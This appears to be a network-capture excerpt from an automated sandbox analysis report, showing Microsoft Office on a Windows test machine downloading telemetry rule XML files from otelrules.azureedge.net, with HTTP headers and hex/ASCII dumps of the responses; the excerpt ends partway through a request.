                                                                                                                                                                                                Nov 20, 2024 10:54:33.880368948 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                0192.168.2.74970313.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:17 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:17 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:17 GMT
                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                Content-Length: 218853
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public
                                                                                                                                                                                                Last-Modified: Tue, 19 Nov 2024 13:10:03 GMT
                                                                                                                                                                                                ETag: "0x8DD089B7B2F27B3"
                                                                                                                                                                                                x-ms-request-id: 082f1a68-301e-005d-348c-3ae448000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095417Z-185f5d8b95crwqd8hC1NYCps680000000a1g000000008cwu
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:17 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                2024-11-20 09:54:17 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                2024-11-20 09:54:17 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                2024-11-20 09:54:17 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                2024-11-20 09:54:17 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                2024-11-20 09:54:17 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                2024-11-20 09:54:17 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                2024-11-20 09:54:17 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                2024-11-20 09:54:17 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                2024-11-20 09:54:17 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                1192.168.2.74970813.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:18 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:18 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 2160
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                x-ms-request-id: 8753231e-501e-008f-038c-3a9054000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095418Z-185f5d8b95c4bhwphC1NYCs8gw0000000a5000000000b4t1
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:18 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                2192.168.2.74970413.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:18 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:18 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 450
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                x-ms-request-id: ac6669be-e01e-003c-668c-3ac70b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095418Z-185f5d8b95cf7qddhC1NYC66an0000000a5g000000004gfz
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:18 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                3192.168.2.74970513.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:18 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:18 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 2980
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                x-ms-request-id: 884d2a23-a01e-00ab-5b8c-3a9106000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095418Z-r1d97b99577lxltfhC1TEByw2s00000008q000000000b4nz
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:18 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                4192.168.2.74970613.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:18 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:18 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 3788
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                x-ms-request-id: f909c6c7-c01e-0049-518c-3aac27000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095418Z-1777c6cb7544n7p6hC1TEByvb400000009mg000000004kvq
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:18 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                5192.168.2.74970713.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:18 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
